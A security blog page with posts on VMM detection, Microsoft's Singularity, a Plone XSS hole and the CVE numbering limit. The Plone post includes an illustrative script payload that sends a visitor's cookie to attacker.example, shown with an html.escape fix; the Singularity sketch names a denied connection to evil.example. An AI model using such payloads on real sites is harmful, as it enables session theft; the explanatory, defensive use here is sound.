Posts tagged secure-programming


Thoughts on Virtualization, Security and Singularity

The “VMM Detection Myths and Realities” paper has been widely reported and discussed.  It considers whether a piece of software could detect that it is running inside a Virtual Machine Monitor (VMM); an undetectable VMM would be “transparent”.  The authors make many arguments against the practicality and the commercial viability of a VMM that could provide performance, stealth, and reproducible, consistent timings.  The arguments are interesting and reasonably convincing that absolute undetectability is currently infeasible to guarantee.

However, I note that the authors argue from essentially the same position as atheists arguing that there is no God.  They argue that a fully transparent VMM is unlikely and impractical, and would require an absurd amount of resources, both in hardware and in software development effort.  This is reasonable: the VMM has to fail only once to be detected, there are many ways in which it can fail, and preventing each kind of detection is complex.  However, this is not a hermetic, formal proof that a transparent VMM is impossible and cannot exist;  a new breakthrough technology, or an “alien science-fiction” god-like technology, might make it possible.

Then the authors argue that with the spread of virtualization, it will become moot for malware to try to detect whether it is running inside a virtual machine.  One might be tempted to remark: doesn’t this argument cut both ways, also making it moot for an operating system or a security tool to try to detect whether it is running inside a malicious VMM?

McAfee’s “secure virtualization”
The security seminar by George Heron answers some of the questions I was asking at last year’s VMworld conference, and elaborates on what I had in mind then.  The idea is to integrate security functions within the virtual machine monitor.  Malware nowadays prevents the installation of security tools and interferes with them as much as possible.  If malware is successfully confined inside a virtual machine, while the security tools operate from outside that scope, an attacker could find it impossible to disable them.  I really like that idea.
 
The security tools could then reasonably expect to run directly on the hardware or on an unvirtualized host OS, so VMM detection isn’t a moot point for the defender.  However, the presentation did not discuss whether the McAfee security suite would attempt to detect if the VMM itself had been virtualized by an attacker.  Would it even be possible to detect a “bad” VMM if the McAfee security tools themselves ran inside a virtualized environment on top of the “good” VMM?  Perhaps that would require more hooks into the VMM; many, in fact, to attempt to catch all the possible ways in which a malicious VMM can fail to hide itself properly.  What is the cost of all these detection attempts, which must be executed regularly?  Isn’t it prohibitive, making strong detection of malicious VMMs impractical?  In the end, I believe this may be yet another race that depends on how much effort each side is willing to put into cloaking and detection.  Practical detection is almost as hard as practical hiding, and the detection cost has to be paid on every machine, all the time.
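To make the cost argument concrete, here is a toy sketch of the simplest timing-based detection heuristic: time a fixed workload repeatedly and look for the jitter an interposing VMM tends to introduce.  This is my own illustration, not from the paper or from McAfee; real detectors time sensitive instructions such as CPUID, and the threshold below is an arbitrary assumption, a weak signal at best.

```python
import statistics
import time

def time_workload(iterations=100_000):
    """Time one run of a fixed CPU-bound workload with a high-resolution clock."""
    start = time.perf_counter()
    total = 0
    for i in range(iterations):
        total += i * i
    return time.perf_counter() - start

# Collect repeated samples; on bare hardware timings tend to be tight,
# while VMM interposition can inflate both the mean and the variance.
samples = [time_workload() for _ in range(50)]
mean = statistics.mean(samples)
jitter = statistics.stdev(samples) / mean  # coefficient of variation

# The 10% threshold is an arbitrary illustration, not a calibrated test.
if jitter > 0.10:
    print(f"timing jitter {jitter:.1%}: possibly virtualized (weak signal)")
else:
    print(f"timing jitter {jitter:.1%}: no obvious timing anomaly")
```

Note that a check like this must run regularly to be useful, which is exactly the ongoing cost the defender has to pay.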


Which Singularity?
Microsoft’s Singularity project attempts to create an OS and execution environment that are simpler and secure by design.  What strikes me is how much it resembles the “white list” approach I’ve been talking about.  Singularity constructs secure systems from statements (“manifests”) in a provable manner: it specifies what processes do and what may happen, instead of focusing on what must not happen.
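As a rough illustration of the contrast (the manifest format and names below are invented for this example, and are not Singularity’s actual syntax), a white-list system permits only what a manifest declares and denies everything else by default:

```python
# Hypothetical manifest: declares everything a process MAY do.
# Invented for illustration; not Singularity's actual manifest format.
MANIFEST = {
    "log-rotator": {"read:/var/log", "write:/var/log", "exec:/bin/gzip"},
}

def allowed(process: str, action: str) -> bool:
    # Default deny: an action is permitted only if the manifest states it.
    return action in MANIFEST.get(process, set())

print(allowed("log-rotator", "write:/var/log"))        # True: declared
print(allowed("log-rotator", "connect:evil.example"))  # False: never declared
```

A black-list system would instead enumerate forbidden actions, and fail open for anything it didn’t anticipate.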

Last year I thought that virtualization and security could deliver a revolution;  now I think it’s more of the same “keep building defective systems and defend them vigorously” approach, just somewhat stronger.  Even if I find the name somewhat arrogant, “Singularity” suggests a future for security that is more attractive and fundamentally stable than yet another arms race.  In the meantime, though, “secure virtualization” should help; expect lots of marketing about it.

Do Open Source Devs Get Web App Security?  Does Anybody?

Note: I’ve updated this article after getting some feedback from Alexander Limi.

A colleague of mine who is dealing with Plone, a CMS system built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.

The document describes a hole (subsequently patched) in Plone that allowed users to upload arbitrary JavaScript.  Apparently no input or output filtering was being done.  Anyone familiar with XSS attacks can see the potential for stealing cookie data, but the article seems to imply this is simply a spam issue:

Clean up link spam

Is this a security hole?
No. This is somebody logging in to your site (if you allow them to create their own users) and adding content that can redirect people to a different web site. Your server, site and content security is not compromised in any way. It’s just a slightly more sophisticated version of comment spam. If you open up your site to untrusted users, there will always be a certain risk that people add content that is not approved. It’s annoying, but it’s not a security hole.

Well, yes, actually, it is a security hole.  If one can place JavaScript on your site that redirects the user to another page, one can certainly place JavaScript on your site that grabs a user’s cookie data and sends it to another site.  Whether or not the attacker gets something useful from that data varies from app to app, of course.  What worried me is that it appeared as if one of Plone’s founders (the byline on this document is for Alexander Limi, whose user page describes him as “one of Plone’s original founders”) did not consider this a security issue.  After getting feedback from Alexander Limi, it is clear that he does understand the user-level security implications of the vulnerability, but was trying to make the distinction that there was no security risk to the Plone site itself.  Still, the language of the document is (unintentionally) misleading, and it’s very reminiscent of the kinds of misunderstandings and excuses I see all the time in open-source web app development.
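To make the equivalence concrete, here is a minimal sketch; the payload and the rendering functions are illustrative, not Plone code.  The same injection vector that “redirects people to a different web site” can carry the visitor’s cookie along, and the output filtering that was missing (shown here with Python’s html.escape) neutralizes both:

```python
import html

# Illustrative payload: the injection that can redirect a visitor can
# just as easily exfiltrate that visitor's session cookie first.
payload = ('<script>document.location="http://attacker.example/steal?c="'
           '+document.cookie;</script>')

def render_unsafely(user_content: str) -> str:
    # Vulnerable: user content is echoed verbatim into the page.
    return "<div class='comment'>" + user_content + "</div>"

def render_safely(user_content: str) -> str:
    # Output filtering: HTML metacharacters are escaped, so the browser
    # displays the payload as inert text instead of executing it.
    return "<div class='comment'>" + html.escape(user_content) + "</div>"

print(render_unsafely(payload))  # script runs in the victim's browser
print(render_safely(payload))    # &lt;script&gt;... rendered harmlessly
```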

The point here is (believe it or not) not to pick on Plone.  This problem is prevalent in most open source development (and in closed source development, in my experience): people who simply shouldn’t be writing code are doing the coding, the implementation, and the maintenance.

Let’s be blunt: A web developer is not qualified to do the job if he or she does not have a good understanding of web application security concepts and techniques.  Leaders of development teams must stop allowing developers who are weak on security techniques to contribute to their products, and managers need to stop hiring candidates who do not demonstrate a solid secure programming background.  If they continue to do so, they demonstrate a lack of concern for the safety of their customers.

Educational initiatives must be stepped up to address this, both at the traditional academic level and in continuing education/training programs.  Students in undergraduate web development curricula need to be taught the importance of security and effective secure programming techniques.  Developers in the workforce today need access to materials and programs that will do the same.  And the managerial level needs to be brought up to speed on what to look for in the developers they hire, so that under-qualified and unqualified developers are no longer the norm on web dev teams.

 

2007: The year of the 9,999 vulnerabilities?

A look at the National Vulnerability Database statistics reveals that the number of vulnerabilities found yearly has greatly increased since 2003:

Year    Vulnerabilities    % Increase
2002    1959               N/A
2003    1281               -35%
2004    2367               +85%
2005    4876               +106%
2006    6605               +35%



Average yearly increase (including the 2002-2003 decline): 48%

6605 × 1.48 ≈ 9775
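The same projection, worked out in a short Python snippet from the table above:

```python
# Yearly vulnerability counts from the NVD table above.
counts = {2002: 1959, 2003: 1281, 2004: 2367, 2005: 4876, 2006: 6605}

years = sorted(counts)
# Year-over-year growth, including the 2002-2003 decline.
growth = [counts[b] / counts[a] - 1 for a, b in zip(years, years[1:])]
avg = sum(growth) / len(growth)  # ~0.479, which rounds to 48%

projection_2007 = counts[2006] * (1 + avg)
print(f"average yearly increase: {avg:.0%}")         # 48%
print(f"projected for 2007: {projection_2007:.0f}")  # ~9769; the 9775 above uses the rounded 48%
```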

So, that’s not quite 9999, but fairly close.  There’s enough variance in the yearly increases that hitting 9999 in 2007 seems plausible.  If not in 2007, then it seems likely that we’ll hit 9999 in 2008.  So, why does it matter?



MITRE’s CVE effort uses a numbering scheme for vulnerabilities that can accommodate only 9999 entries per year:  CVE-YEAR-XXXX.  Many CVE-compatible products and vulnerability databases (e.g., my own Cassandra service, the CIRDB, etc.) use a field of fixed size just big enough for that format.  We’re facing a problem similar to the year-2000 overflow, although much smaller in scope.  When the CVE board of editors was formed, the total number of known vulnerabilities, not the number found yearly, was in the hundreds.  A yearly count of 9999 seemed astronomical;  I’m sure that anyone who had raised it as a concern back then would have been laughed at.  I felt at the time that it would take a security apocalypse to reach that number.  Yet here we are, and this is fair warning to everyone using or developing CVE-compatible products.
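As a sketch of the failure mode (the parsing code is illustrative, not taken from any particular product), consider a tool whose CVE field assumes exactly four digits after the year:

```python
import re

# A fixed-width pattern like this is what a CVE-compatible tool might use
# if its storage field is sized for exactly "CVE-YYYY-NNNN" (13 characters).
FIXED = re.compile(r"^CVE-(\d{4})-(\d{4})$")

def parse_fixed(cve_id: str):
    m = FIXED.match(cve_id)
    if not m:
        raise ValueError(f"not a valid CVE id: {cve_id}")
    return int(m.group(1)), int(m.group(2))

print(parse_fixed("CVE-2006-6605"))  # fine: (2006, 6605)
try:
    parse_fixed("CVE-2007-10000")    # a hypothetical 10,000th entry of the year
except ValueError as e:
    print(e)  # the overflow case: five digits no longer fit the field
```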



Kudos to the National Vulnerability Database and the MITRE CVE teams for keeping up under the onslaught.  I’m impressed.